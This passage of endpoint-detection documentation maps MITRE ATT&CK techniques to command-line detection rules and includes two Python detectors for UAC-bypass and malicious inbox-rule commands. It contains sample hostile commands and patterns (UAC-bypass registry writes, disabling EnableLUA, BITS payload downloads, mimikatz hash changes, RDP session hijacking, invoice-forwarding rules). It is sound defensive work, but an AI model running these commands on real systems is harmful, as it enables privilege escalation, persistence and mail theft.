Creating a shortcut (.lnk) in the user's Startup folder via PowerShell WScript.Shell.CreateShortcut is a common technique for adding persistent execution that survives reboots.
This rule fires when PowerShell commands creating a shortcut via $WScriptShell = New-Object -ComObject WScript.Shell and $Create.Save() are detected. No action beyond logging is configured (severity 85).
T1137.004 Office Application Startup: Outlook Home Page
Adding custom folder home pages to Outlook via registry (reg.exe add HKCU\Software\Microsoft\Office\) can load malicious content from a remote URL each time the folder is opened in Outlook.
This rule fires when the specific Outlook registry modification command is detected. No action beyond logging is configured (severity 70).
T1546.001 Event Triggered Execution: Change Default File Association
Hijacking the default file handler for common extensions (.txt, .pdf, etc.) causes malicious code to execute whenever a user opens a file of that type.
This rule fires when HKEY_CLASSES_ROOT. is referenced in command-line arguments, indicating a file association modification. No action beyond logging is configured (severity 80).
T1037.001 Boot or Logon Initialization Scripts: Logon Script
Writing to HKCU\Environment\UserInitMprLogonScript causes a script to run every time the user logs in, before the shell is started, providing stealthy, pre-desktop persistence.
This rule fires when this specific registry path is referenced in command-line arguments. No action beyond logging is configured (severity 85).
T1078.003 Valid Accounts: Local Accounts
Using PsExec or net use with local account credentials is a common lateral movement technique that leverages existing, legitimate accounts to move between systems.
This rule fires when PsExec, psexec, PsExec64, psexec64, or net use are detected in command-line arguments. No action beyond logging is configured (severity 70).
T1574.005 Hijack Execution Flow: Executable Installer File Permissions Weakness
Disabling UAC detection of installer elevation attempts by modifying EnableInstallerDetection allows installers to run silently without triggering security prompts.
This rule fires when UAC policy registry modifications are detected (same pattern as T1574.010 above). No action beyond logging is configured (severity 85).
T1098 Account Manipulation
LSADUMP commands (ChangeNTLM, SetNTLM) are used by Mimikatz to directly modify NTLM password hashes in the Local Security Authority, enabling password-less persistence.
This rule fires when LSADUMP::ChangeNTLM or LSADUMP::SetNTLM are detected in command-line arguments. No action beyond logging is configured (severity 85).
T1136 Create Account
This rule covers all variants of local and domain user account creation through both the GUI (MMC "New User" dialog) and the command line (net user add, New-LocalUser, net user /ADD /DOMAIN, New-ADUser).
This rule fires when any user creation event is detected through any of these methods. No action beyond logging is configured (severity 75).
T1546.002 Event Triggered Execution: Screensaver
Replacing the system screensaver executable with a malicious binary causes it to execute whenever the screensaver activates, a classic event-triggered persistence technique.
This rule fires when Write or Delete operations targeting screensaver files (scrnsave.scr) are detected, or when registry keys controlling screensaver settings (HKCU\Control Panel\Desktop\) are modified. No action beyond logging is configured (severity 75).
T1546.005 Event Triggered Execution: Trap
On Unix-like systems, the trap command intercepts signals, providing a way to execute code when specific events occur. This rule detects its presence in scripts or command-line executions.
This rule fires when the trap keyword is detected in command-line arguments. No action beyond logging is configured (severity 70).
T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness
Modifying service registry keys, particularly the ServiceDll value, allows attackers to load malicious DLLs through legitimate Windows services.
This rule fires when service registry paths (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll) or get-acl are detected in command-line arguments. No action beyond logging is configured (severity 85).
T1543.003 Create or Modify System Process: Windows Service
Creating or modifying a Windows service via sc.exe or the MMC Services snap-in is a high-value persistence and privilege escalation technique, because services typically run as LocalSystem.
This rule fires when sc.exe is detected in command-line arguments or when the MMC Services snap-in is opened. Because it matches any sc.exe invocation, read-only queries such as sc query or sc qc issued by administrators and scripts also trigger it; scope it to non-administrative users or exclude known management tooling before raising the action above logging. No action beyond logging is configured (severity 95).
T1136.001 Create Account: Local Account
Creating a local Windows user account via command line (net user /add, Add-NetUser) or MMC provides the attacker with a persistent login that survives domain-level credential resets.
This rule fires when these local account creation commands are detected or when the MMC "New User" dialog is opened. No action beyond logging is configured (severity 75).
T1197 BITS Jobs: Bitsadmin Download (PowerShell)
Start-BitsTransfer is the PowerShell equivalent of bitsadmin and is used to perform background file downloads through the BITS service.
This rule fires when Start-BitsTransfer -Priority foreground -Source is detected in command-line arguments. No action beyond logging is configured (severity 90).
T1547.002 Boot or Logon Autostart: Authentication Package
Authentication packages registered under HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ are loaded into LSASS at boot, providing system-level persistence with direct access to credential material.
This rule fires when Lsa registry paths (Authentication Packages, RunAsPPL) are referenced in command-line arguments. No action beyond logging is configured (severity 75).
T1197 BITS Jobs (General)
A comprehensive BITS detection rule using regex to catch all BITS-related commands including Start-BitsTransfer, bitsadmin create/addfile/SetNotifyCmdLine/SetMinRetryDelay/resume/transfer patterns.
This rule fires when any BITS-related command pattern is detected. No action beyond logging is configured (severity 90).
T1546.013 Event Triggered Execution: PowerShell Profile
Writing to PowerShell profile files causes code to execute every time a PowerShell session is started, providing silent persistence in development environments where PowerShell is used regularly.
This rule fires when Write or Delete operations target $PsHome\Profile.ps1 or $Home\My Documents\PowerShell\Profile.ps1, or when Add-Content is used from the command line to append to these files. No action beyond logging is configured (severity 80). Note that on current Windows builds the per-user profile lives under $Home\Documents\WindowsPowerShell\ (Windows PowerShell 5.1) or $Home\Documents\PowerShell\ (PowerShell 7), so extend the file paths in the rule to match whichever your fleet uses.
T1137.005 Office Application Startup: Outlook Rules
Malicious Outlook inbox rules can silently redirect emails, delete security notifications, or forward communications to an attacker's address, all triggered by incoming email.
This rule fires when New-InboxRule or Set-InboxRule are detected in command-line arguments, or when Outlook is open with the "Create Rule", "Rules and Alerts", or "New Rule" dialog titles visible. No action beyond logging is configured (severity 60).
10. TA0004 Privilege Escalation
This policy covers MITRE ATT&CK Tactic TA0004 (Privilege Escalation): techniques used by adversaries to gain higher-level permissions than they initially obtained. These rules monitor UAC bypass attempts, token manipulation, policy modifications, and boot/logon autostart mechanisms that can be exploited for elevation.
T1547.004 Boot or Logon Autostart: Winlogon Helper DLL
Injecting a malicious DLL via the Winlogon registry key grants the DLL execution at the highest privilege level during the logon sequence.
This rule fires when the Winlogon registry paths (HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ or the HKCU equivalent) are referenced in command-line arguments. The Warn action fires on detection.
T1574.005 Hijack Execution Flow: Executable Installer File Permissions Weakness
Turning off UAC's installer detection stops Windows from recognising setup programs and prompting for elevation; the installer then runs without a consent prompt (it does not gain SYSTEM rights by itself, but the administrator loses the warning that an installer is launching). This rule and the T1574.010 rule below match the same registry modification, so a single event raises both alerts unless you disable one.
This rule fires when the UAC policy registry keys are modified via command line. The Warn action fires on detection.
T1547.001 Boot or Logon Autostart: Security Support Provider
Adding a malicious DLL as a Security Support Provider (SSP) causes it to be loaded by lsass.exe with SYSTEM privileges, providing both persistence and access to credential material.
This rule fires when Get-ItemProperty targeting the LSA Security Packages value or Set-ItemProperty modifying that value are detected. The Warn action fires on detection.
T1548.002 Bypass UAC: Event Viewer (cmd)
Using Event Viewer as a UAC bypass is a well-known technique: eventvwr.exe auto-elevates and resolves the mscfile handler from HKCU first, so writing HKCU\software\classes\mscfile\shell\open\command makes it launch the attacker's command at high integrity without a prompt. Microsoft changed this lookup in Windows 10 version 1703, but the registry write remains a strong signal because bypass tooling still attempts it.
This rule fires when reg.exe add hkcu\software\classes\mscfile\shell\open\command or cmd.exe /c eventvwr.msc is detected. The Warn action fires on detection.
T1574.010 Hijack Execution Flow: Services File Permissions Weakness
Modifying UAC Installer Detection settings silently weakens the elevation protection mechanism.
This rule fires when UAC system policy registry values are modified via command-line. The Warn action fires on detection.
T1548.002 Bypass UAC (General)
This broader UAC bypass rule catches execution of eventvwr.exe from the command line or modification of HKCU\Software\Classes\ms-settings\shell\open\command, the handler abused by the fodhelper.exe (and computerdefaults.exe) bypass; the sdclt.exe variant uses different HKCU\Software\Classes keys and is not covered by this pattern.
This rule fires when these patterns are detected. The Warn action fires on detection.
T1548.002 Bypass UAC: Disable UAC via reg.exe
Directly disabling UAC by setting EnableLUA to 0 removes User Account Control entirely: after the next reboot, members of the Administrators group run every process with their full token and never see a consent prompt. Writing this HKLM value already requires administrative rights, so the rule catches an attacker who has elevated once and is removing the prompts for everything that follows.
This rule fires when reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 is detected. The Warn action fires immediately. The match is on the literal string: reg add without the .exe suffix, a /d 0x00000000 value, or a Set-ItemProperty call reaches the same end state without matching, so consider broadening the pattern.
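The BITS rule in the Persistence policy and the UAC bypass rules above all key on literal strings in the process command line. The following Python script is an added example, not part of the demo policies or of Teramind's rule engine: it normalises each command line (lower-case, quotes stripped, whitespace collapsed) and then applies one regular expression per rule to a set of constructed process-creation events, so that REG ADD without the .exe suffix or a /d 0x00000000 value still matches. The event list, the rule titles and the fodhelper.exe check are assumptions made for the example and are not drawn from the imported policies.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class Rule:
    name: str            # technique ID plus the rule title used on this page
    pattern: re.Pattern  # evaluated against the normalised command line

def normalize(cmdline: str) -> str:
    """Lower-case, drop quote characters and collapse whitespace so that
    'REG.EXE  ADD "HKLM\\..."' and 'reg add hklm\\...' compare equal."""
    s = cmdline.replace('"', "").replace("'", "")
    return re.sub(r"\s+", " ", s).strip().lower()

RULES = [
    Rule("T1197 BITS Jobs (General)",
         re.compile(r"bitsadmin(?:\.exe)?\s+/(?:create|addfile|setnotifycmdline|setminretrydelay|resume|transfer)\b"
                    r"|\bstart-bitstransfer\b")),
    Rule("T1548.002 Bypass UAC: Event Viewer",
         re.compile(r"hkcu\\software\\classes\\mscfile\\shell\\open\\command|\beventvwr(?:\.exe|\.msc)?\b")),
    # ms-settings handler; the fodhelper.exe binary name is an assumption added for this example
    Rule("T1548.002 Bypass UAC: ms-settings handler",
         re.compile(r"hkcu\\software\\classes\\ms-settings\\shell\\open\\command|\bfodhelper(?:\.exe)?\b")),
    # accepts 'reg add ... /d 0', '/d 0x00000000' and 'Set-ItemProperty ... -Name EnableLUA -Value 0'
    Rule("T1548.002 Bypass UAC: Disable UAC via reg.exe",
         re.compile(r"enablelua\b.*?(?:/d|-value)\s+(?:0x)?0+\b")),
]

# The exact-substring form of the EnableLUA rule as it is described on this page.
LITERAL_ENABLELUA = (r"reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
                     r" /v EnableLUA /t REG_DWORD /d 0")

def literal_hit(cmdline: str) -> bool:
    return LITERAL_ENABLELUA in cmdline

def matching_rules(cmdline: str) -> list[str]:
    norm = normalize(cmdline)
    return [r.name for r in RULES if r.pattern.search(norm)]

# Constructed process-creation events: (event id, user, command line). Not real telemetry.
SAMPLE_EVENTS = [
    ("e1", "jdoe", r"bitsadmin.exe /transfer job1 https://files.example.test/t.exe C:\Users\jdoe\t.exe"),
    ("e2", "jdoe", r'powershell -c "Start-BitsTransfer -Priority foreground -Source https://files.example.test/t.exe -Destination C:\Users\jdoe\t.exe"'),
    ("e3", "jdoe", r'REG  ADD "HKCU\Software\Classes\mscfile\shell\open\command" /ve /d "C:\Users\jdoe\p.exe" /f'),
    ("e4", "jdoe", r"cmd.exe /c eventvwr.msc"),
    ("e5", "jdoe", r'reg add HKCU\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_SZ /d "" /f'),
    ("e6", "svc_backup", r"REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0x00000000 /f"),
    ("e7", "admin", r"bitsadmin /list /allusers"),            # read-only BITS query, must not match
    ("e8", "jdoe", r"notepad.exe C:\Users\jdoe\notes.txt"),   # unrelated
]

def run_report(events=SAMPLE_EVENTS) -> dict[str, list[str]]:
    return {eid: matching_rules(cmd) for eid, _user, cmd in events}

if __name__ == "__main__":
    for eid, user, cmd in SAMPLE_EVENTS:
        hits = matching_rules(cmd)
        print(f"{eid} {user:10} {'; '.join(hits) or '-':55} {cmd}")
    # e6 reaches the same end state as the documented pattern but evades a literal match:
    print("literal EnableLUA pattern hits e6:", literal_hit(SAMPLE_EVENTS[5][2]))
```

Event e6 is the interesting case: the literal pattern quoted on this page misses it because the operator typed REG ADD rather than reg.exe ADD and supplied the value as 0x00000000, while the normalised regex still classifies it as the EnableLUA bypass. Event e7 shows the other side of the tuning problem: bitsadmin /list is a read-only query and should stay out of the BITS alert.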
T1134.002 Access Token Manipulation: Create Process with Token
The runas command and Invoke-RunAs create new processes under a different user's security context, effectively impersonating another user's privileges.
This rule fires when runas or Invoke-RunAs are detected in command-line arguments. The Warn action fires on detection. Help-desk and administrative staff use runas routinely, so expect to exclude those accounts or their tooling to keep the alert actionable.
T1547.014 Boot or Logon Autostart: Active Setup
Active Setup commands (StubPath values) run in the context of each user at logon, so a command planted there executes with administrative rights as soon as an administrator signs in, which makes the technique useful for escalation as well as persistence.
This rule fires when HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ is referenced in command-line arguments. The Warn action fires on detection.
T1484.001 Domain Policy Modification: Group Policy Modification
Modifying Group Policy Objects (GPOs) can affect all machines in the domain simultaneously, enabling attackers to push malicious configurations to every endpoint.
This rule fires when New-GPOImmediateTask is detected in command-line arguments, or when the Local Group Policy Editor or Group Policy Management MMC snap-in is opened. The Warn action fires on detection.
11. TA0005 Defense Evasion
This policy covers MITRE ATT&CK Tactic TA0005 (Defense Evasion): techniques used to avoid detection and analysis. Rules monitor firewall manipulation, signed binary proxy execution, email hiding, and indirect command execution methods.
T1562.004 Impair Defenses: Disable Firewall (HARDRAIN)
The HARDRAIN malware opens specific inbound firewall ports with netsh to enable its proxy C2 communications.
This rule fires when the exact netsh advfirewall firewall add rule name="atomic testing" action=allow dir=in protocol=TCP localport=450 command is detected. The Warn action fires immediately. Note that the rule name "atomic testing" and port 450 come from the Atomic Red Team emulation of this behaviour, not from the malware, so as written the rule validates your detection pipeline against that test rather than catching a real HARDRAIN infection. To cover the technique itself, match netsh advfirewall firewall add rule with action=allow and dir=in and review the port and program in the alert.
T1202 Indirect Command Execution: pcalua.exe
pcalua.exe (Program Compatibility Assistant) can be used to execute arbitrary programs as a signed Windows binary, bypassing application whitelisting rules that block direct execution.
This rule fires when pcalua.exe -a is detected in command-line arguments. The Warn action fires on detection.
T1218.011 Signed Binary Proxy Execution: Rundll32 syssetup.dll
rundll32.exe syssetup.dll,SetupInfObjectInstallAction processes an attacker-supplied .inf file, which lets arbitrary commands run under a signed Windows binary and proxies execution past controls that trust rundll32.exe.
This rule fires when rundll32.exe syssetup.dll is detected in command-line arguments. The Warn action fires on detection.
T1564.008 Hide Artifacts: Email Hiding Rules
Attackers who gain access to an email account often create inbox rules to silently delete or redirect security-relevant emails, preventing the victim from seeing alerts or anomaly reports.
This rule fires when New-InboxRule or Set-InboxRule are detected in command-line arguments. The Warn action fires on detection. Because it only checks for the cmdlet name, it fires equally on a legitimate filing rule and on one that forwards mail externally or deletes it; the parameters in the alert (ForwardTo, RedirectTo, DeleteMessage, MoveToFolder) are what distinguish the two.
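The T1137.005 Outlook Rules entry in the Persistence policy and the T1564.008 Email Hiding Rules entry above both stop at the presence of New-InboxRule or Set-InboxRule. The following Python script is an added example, not part of the demo policies or of Teramind, that goes one step further: it parses the cmdlet's parameters out of the command line (unwrapping a powershell -Command "..." wrapper where present) and scores the rule by what it does, so external forwarding and message deletion rank above a rule that files vendor newsletters. The cmdlet and parameter names are the real Exchange ones; the organisation domain, the hiding-folder list, the keyword list, the weights and the sample command lines are assumptions made for the example.

```python
from __future__ import annotations
import re
import shlex

RULE_CMDLETS = ("new-inboxrule", "set-inboxrule")
FORWARD_PARAMS = ("forwardto", "forwardasattachmentto", "redirectto")
ORG_DOMAINS = ("contoso.test",)      # assumption: the organisation's own mail domains
# Folders attackers commonly route hidden mail into, and keywords whose filtering suggests the rule
# exists to hide warnings or intercept payments. Both lists are assumptions for this example.
HIDING_FOLDERS = ("rss feeds", "rss subscriptions", "deleted items", "junk email", "archive", "conversation history")
SUSPICIOUS_WORDS = ("password", "phish", "hack", "suspicious", "security", "alert", "invoice", "wire", "payment")

def _tokens(cmdline: str) -> list[str]:
    out = []
    for tok in shlex.split(cmdline, posix=True):
        # powershell -Command "..." hands the whole script over as one quoted argument: unwrap it
        if " " in tok and any(c in tok.lower() for c in RULE_CMDLETS):
            out.extend(_tokens(tok))
        else:
            out.append(tok)
    return out

def parse_inbox_rule(cmdline: str) -> dict[str, list[str]] | None:
    """Return {parameter: [values]} for the first New-/Set-InboxRule in the command line, else None."""
    try:
        tokens = _tokens(cmdline)
    except ValueError:                       # unbalanced quotes
        return None
    start = next((i for i, t in enumerate(tokens) if t.lower() in RULE_CMDLETS), None)
    if start is None:
        return None
    params: dict[str, list[str]] = {}
    current = None
    for tok in tokens[start + 1:]:
        if tok.startswith("-") and len(tok) > 1 and tok[1].isalpha():
            current = tok[1:].lower()
            params[current] = []             # a switch parameter keeps an empty list
        elif current is not None:
            params[current].extend(v.strip() for v in tok.split(",") if v.strip())
    return params

def _is_true(values: list[str]) -> bool:     # switch form (-DeleteMessage) or explicit $true
    return not values or values[0].lower() in ("$true", "true", "1")

def assess_inbox_rule(cmdline: str, org_domains=ORG_DOMAINS) -> tuple[int, list[str]]:
    params = parse_inbox_rule(cmdline)
    if params is None:
        return 0, []
    score, findings = 0, []
    for p in FORWARD_PARAMS:
        for addr in params.get(p, []):
            if addr.rsplit("@", 1)[-1].lower() not in org_domains:
                score += 60
                findings.append(f"-{p} sends mail to external address {addr}")
    if "deletemessage" in params and _is_true(params["deletemessage"]):
        score += 40
        findings.append("-DeleteMessage removes matching mail from the mailbox")
    for folder in params.get("movetofolder", []):
        leaf = re.split(r"[\\:]", folder)[-1].strip().lower()   # 'jdoe:\RSS Feeds' -> 'rss feeds'
        if leaf in HIDING_FOLDERS:
            score += 30
            findings.append(f"-MoveToFolder hides mail in '{leaf}'")
    words = params.get("subjectcontainswords", []) + params.get("bodycontainswords", [])
    if any(w in word.lower() for word in words for w in SUSPICIOUS_WORDS):
        score += 25
        findings.append("filters on security/finance keywords: " + ", ".join(words))
    if "markasread" in params and _is_true(params["markasread"]):
        score += 10
        findings.append("-MarkAsRead suppresses the unread indicator")
    return score, findings

def severity(score: int) -> str:
    return "high" if score >= 60 else "medium" if score >= 30 else "low" if score > 0 else "none"

SAMPLE_COMMAND_LINES = [   # constructed command lines, not real telemetry
    "powershell.exe -Command \"New-InboxRule -Name 'Invoices' -SubjectContainsWords 'invoice','payment' -ForwardTo 'ap@contoso-payments.test' -DeleteMessage $true\"",
    r"New-InboxRule -Mailbox jdoe -Name 'Vendor news' -FromAddressContainsWords 'news@vendor.test' -MoveToFolder ':\Vendor news' -MarkAsRead $true",
    r"Set-InboxRule -Identity 'Clean up' -SubjectContainsWords 'password','suspicious sign-in' -MoveToFolder ':\RSS Feeds' -MarkAsRead $true",
    "Get-InboxRule -Mailbox jdoe",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMAND_LINES:
        score, findings = assess_inbox_rule(cmd)
        print(f"{severity(score):6} {score:3}  {cmd[:60]}")
        for f in findings:
            print("        -", f)
```

The first sample is the classic business-email-compromise rule (forward invoices to a lookalike domain and delete the copy) and scores high; the third hides security warnings in the RSS Feeds folder and scores medium; the vendor-newsletter rule scores low. PowerShell accepts any unambiguous prefix of a parameter name (for example -Forward for -ForwardTo), which this parser does not expand; a production version should map prefixes to full names before scoring.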
T1218.005 Signed Binary Proxy Execution: Mshta JavaScript Scheme
mshta.exe can execute inline JavaScript via the javascript: URI scheme, allowing attackers to use a trusted Windows binary to load and execute remote malicious content.
This rule fires when mshta.exe javascript:a= is detected in command-line arguments. The Warn action fires on detection.
12. TA0006 Credential Access
This policy covers MITRE ATT&CK Tactic TA0006 (Credential Access): techniques used to steal credentials. Rules detect credential dumping tools, browser password access, network sniffing, and insecure credential storage.
T1003.003 OS Credential Dumping: Create Volume Shadow Copy with WMI
Creating a Volume Shadow Copy via WMI provides a read-consistent snapshot from which locked files can be copied: on a domain controller that is NTDS.dit, enabling offline extraction of every Active Directory password hash; on any other host it is the SAM and SYSTEM hives.
This rule fires when wmic shadowcopy call create Volume= is detected in command-line arguments. The Warn action fires immediately. Backup software creates shadow copies legitimately, so exclude your backup service accounts to keep the alert meaningful.
T1555.003 Credentials from Password Stores: Web Browsers
Accessing browser-stored passwords, whether through the Chrome Settings/Passwords page, Firefox Logins & Passwords, or direct access to the Chrome Login Data SQLite database, is a common credential harvesting technique.
This rule fires when Chrome is navigated to Settings - Passwords, when the Chrome Login Data file path is accessed via command line, or when Firefox shows the Logins & Passwords window. The Warn action fires on detection.
T1040 Network Sniffing: Packet Capture
Running Wireshark or tshark on a corporate network captures plaintext credentials and sensitive data from unencrypted network traffic.
This rule fires when the tshark.exe command is executed with a capture interface argument, or when wireshark.exe is launched. The Warn action fires on detection. Network engineers run both tools as part of their job, so allow-list those users or hosts rather than disabling the rule.
T1003 OS Credential Dumping: Gsecdump
gsecdump.exe is a credential extraction tool that dumps LSA secrets, SAM and cached domain logon hashes, and the credentials of active logon sessions from a Windows host.
This rule fires when gsecdump.exe -a is detected in command-line arguments or when gsecdump.exe is launched. The Warn action fires on detection.
T1552.002 Unsecured Credentials: Credentials in Registry
Querying the registry for password values is a common technique for finding credentials left by administrators, installers, or applications in insecure locations.
This rule fires when reg query HKLM /f password, reg query HKCU /f password, or various PowerShell credential extraction cmdlets (Get-UnattendedInstallFile, Get-Webconfig, Get-CachedGPPPassword, etc.) are detected. The Warn action fires on detection.
T1552 Unsecured Credentials
Credentials pasted into Notepad and stored in plain text files represent a common, low-tech security failure that must be detected and discouraged.
This rule fires when clipboard content containing "Username" or "Password" is pasted into notepad.exe. The Warn action fires on detection.
13. TA0007 Discovery
This policy covers MITRE ATT&CK Tactic TA0007 (Discovery): techniques used by adversaries to gain knowledge about the target system and network. Rules detect reconnaissance commands, system enumeration, and Active Directory discovery activity.
T1049 System Network Connections Discovery
netstat and net use provide a comprehensive view of active network connections. Adversaries use this information to identify interesting targets, data repositories, and C2 channels already established.
This rule fires when netstat or net use are detected in command-line arguments. The Warn action fires on detection. Both commands are common in administrators' hands and in logon scripts, so expect a high baseline volume; the rule is most useful when restricted to non-administrative users or to servers where such commands are unexpected.
T1082 System Information Discovery
systeminfo, hostname, winver, and related commands reveal the operating system version, patch level, hardware configuration, and installed software, all of which inform the attacker's choice of exploits.
This rule fires when systeminfo.exe, winver, systeminfo, hostname, GetComputerName, net config workstation, or date /t are detected in command-line arguments. The Warn action fires on detection.
T1087.002 Account Discovery: Enumerate Default Domain Admin
Querying the domain Administrator account details reveals password policy, account status, and group memberships, helping attackers prioritize their credential theft targets.
This rule fires when net user administrator /domain is detected from the command line. The Warn action fires on detection.
T1069.003 Permission Groups Discovery: Cloud Groups
Enumerating cloud group memberships reveals which users have access to cloud resources, informing the attacker's targeting of privileged cloud accounts.
This rule fires when Get-MsolRole, az ad user get-member-groups, or GetBucketAcl are detected in command-line arguments. The Warn action fires on detection.
T1217 Browser Bookmark Discovery
Browser bookmarks often reveal internal application URLs, development portals, and administrative interfaces that may not be otherwise discoverable.
This rule fires when Firefox profile bookmark paths or Chrome bookmark pages are accessed via command line or browser navigation. The Warn action fires on detection.
T1083 File and Directory Discovery
File and directory enumeration commands (dir, ls, tree, find, Get-ChildItem) are used to map the file system, locate sensitive data, and identify targets for exfiltration.
This rule fires when these enumeration commands are detected in command-line arguments. The Warn action fires on detection. Because dir, ls and Get-ChildItem are among the most frequently typed commands on any host, this rule generates far more events than the others in the policy; treat it as a logging source for investigations, scope it to sensitive file servers, or pair it with a frequency threshold before leaving the Warn action on.
14. TA0008 Lateral Movement
This policy covers MITRE ATT&CK Tactic TA0008 (Lateral Movement): techniques used by adversaries to move through the network and gain access to additional systems.
T1570 Lateral Tool Transfer
Transferring tools between systems using psexec or certutil is a fundamental lateral movement technique that stages attack tools on new targets before executing them.
This rule fires when psexec, PsExec, PsExec64, or certutil are detected in command-line arguments. The Warn action fires on detection. After importing, open the rule and confirm the literal is spelled certutil; a misspelled pattern such as cerutil never matches and the gap is silent.
T1021.006 Remote Services: WinRM (Evil-WinRM)
Evil-WinRM is an attacker-focused WinRM shell designed to provide a feature-rich offensive interface to Windows machines via WinRM.
This rule fires when evil-winrm -i is detected in command-line arguments. The Warn action fires on detection. Note that Evil-WinRM runs on the operator's machine, not on the target, so this rule only sees it when the attacker launches it from a monitored endpoint; WinRM activity arriving at a target is better covered by the Windows Remote Management rule below.
T1072 Software Deployment Tools: Radmin Viewer
Radmin is a legitimate remote administration tool that can be used by attackers as an alternative to common remote access tools that may be blocked or monitored.
This rule fires when any application with radmin in its name is launched. The Warn action fires on detection.
T1021.006 Remote Services: Windows Remote Management
WinRM (winrm) provides a legitimate but powerful remote management channel. Its invocation from the command line may indicate an attacker establishing a remote interactive shell.
This rule fires when winrm is detected in command-line arguments. The Warn action fires on detection. Administrators run winrm quickconfig and winrm get during setup, so expect those to appear; remote command execution over WinRM more often arrives through winrs or PowerShell remoting (Enter-PSSession, Invoke-Command), which this pattern does not cover.
T1563.002 Remote Service Session Hijacking: RDP Hijacking
Hijacking an existing RDP session using the tscon command allows an attacker to silently take over another user's logged-in session without needing their credentials.
This rule fires when query user, sc.exe create sesshijack binpath= "cmd.exe /k tscon", or net start sesshijack are detected in command-line arguments. The Warn action fires on detection.
T1021.002 Remote Services: SMB/Windows Admin Shares
Using net use, PsExec, or similar tools to connect to Windows administrative shares (ADMIN$, C$, IPC$) is a classic lateral movement technique.
This rule fires when net use, psexec, psexec64, PsExec, or PsExec64 are detected in command-line arguments. The Warn action fires on detection.
T1021.002 Remote Services: SMB Map Admin Share
The cmd.exe /c net use command specifically maps a remote administrative share, providing access to the file system of another machine using the current user's credentials.
This rule fires when cmd.exe /c net use is detected in command-line arguments. The Warn action fires on detection. Any command line that matches this rule also matches the SMB/Windows Admin Shares rule above, so the two raise duplicate alerts unless one of them is disabled or given a narrower pattern.
15. TA0009 Collection
This policy covers MITRE ATT&CK Tactic TA0009 (Collection): techniques used to gather data relevant to the adversary's goals before exfiltration.
T1113 Screen Capture
Screen capture via PrintScreen keys, Snipping Tool, or the Problem Steps Recorder (psr.exe) is used by attackers to collect sensitive information displayed on screen without creating persistent files.
This rule fires when PrtScr/Shift+PrtScr keystrokes are detected, when SnippingTool.exe or ScreenSketch.exe is launched, or when psr.exe /start is detected in command-line arguments. The Warn action fires on detection.
T1114.001 Email Collection: Local Email Collection
Copying Outlook PST or OST files provides a complete offline copy of the victim's email, calendar, and contacts, a high-value target for business intelligence exfiltration.
This rule fires when Copy operations targeting Outlook file paths (\Documents\Outlook Files or \AppData\Local\Microsoft\Outlook) are detected, or when commands like copy c:\Users\\backup.pst or Get-Inbox.ps1 are detected. The Warn action fires on detection.
T1119 Automated Collection: Command Prompt
dir /b /s and findstr /e commands are used to enumerate files and search for specific content across the file system, the first step in automated collection of targeted data.
This rule fires when dir c: /b /s or findstr /e are detected in command-line arguments. The Warn action fires on detection.
T1115 Clipboard Data: Collect via VBA
VBA macros can programmatically access and exfiltrate clipboard contents, capturing sensitive data that a user may have copied for a different purpose.
This rule fires when PowerShell commands associated with VBA-driven clipboard collection are detected, including Set-Clipboard -value, Invoke-Maldoc -macroFile, and -sub "GetClipboard". The Warn action fires on detection. Invoke-Maldoc is the helper that Atomic Red Team uses to run its macro test, so this pattern confirms the emulation is seen rather than detecting a real macro; a maldoc delivered by phishing will not announce itself on the command line this way.
T1560.001 Archive Collected Data: Archive via Utility
Compressing collected files into archives (ZIP, 7-Zip, WinRAR) is a standard data staging step before exfiltration, reducing size and making content harder to inspect.
This rule fires when a Write, Copy, or Rename operation is detected while zip.exe, 7zip.exe, or similar archiving utilities are active. The Warn action fires on detection. Check the application names in the imported rule against the binaries actually installed: 7-Zip ships 7z.exe, 7zG.exe and 7zFM.exe rather than 7zip.exe, and WinRAR uses WinRAR.exe and Rar.exe, so a list that names the product instead of the executable never fires.
16. TA0010 Exfiltration
This policy covers MITRE ATT&CK Tactic TA0010 (Exfiltration): techniques used to steal data from the network. Rules detect web-based exfiltration, physical medium transfers, protocol-based data transfer, and C2 channel exfiltration.
T1567.001 Exfiltration Over Web Service: Exfiltration to Code Repository
Using git to commit and push sensitive files to a code repository is a common technique for both accidental and intentional data disclosure, particularly relevant for developer-heavy environments.
This rule fires once per day when git.exe is used with git add, git commit -m, or git pull from the command line. The Warn action fires to create an audit record. Note that git pull brings data onto the host; the command that moves a commit off it is git push, so add git push to the pattern if the goal is exfiltration coverage rather than an activity audit.
T1048.001 Exfiltration Over Alternative Protocol: Unencrypted/Obfuscated
Using FTP, SMTP, or curl to transfer files to arbitrary servers bypasses standard HTTPS-based DLP controls. These protocols may be unmonitored and therefore preferred by attackers.
This rule fires when file Write or Copy operations to network shares are detected, or when Upload operations using FTP, SMTP, Outlook, or curl --upload-file/curl -X POST are performed. The Warn action fires once per day.
T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
Syncing files to cloud storage clients (OneDrive, Dropbox, Google Drive, Box) or copying files from such clients can represent covert data exfiltration using trusted, whitelisted services.
This rule fires when Write operations target a cloud client destination (Any) or when Copy operations originate from a cloud client source. The Warn action fires on detection.
T1048 Exfiltration Over Alternative Protocol: DNS Exfiltration
Invoke-DNSExfiltrator encodes data within DNS queries to exfiltrate it over UDP/53, a protocol that is rarely blocked or inspected in enterprise networks.
This rule fires when Invoke-DNSExfiltrator -i is detected in command-line arguments. The Warn action fires immediately. The match is on the name of one public tool; any renamed copy or a different encoder produces the same stream of long, high-entropy DNS queries without tripping this pattern, so the command-line rule is best paired with DNS-side monitoring.
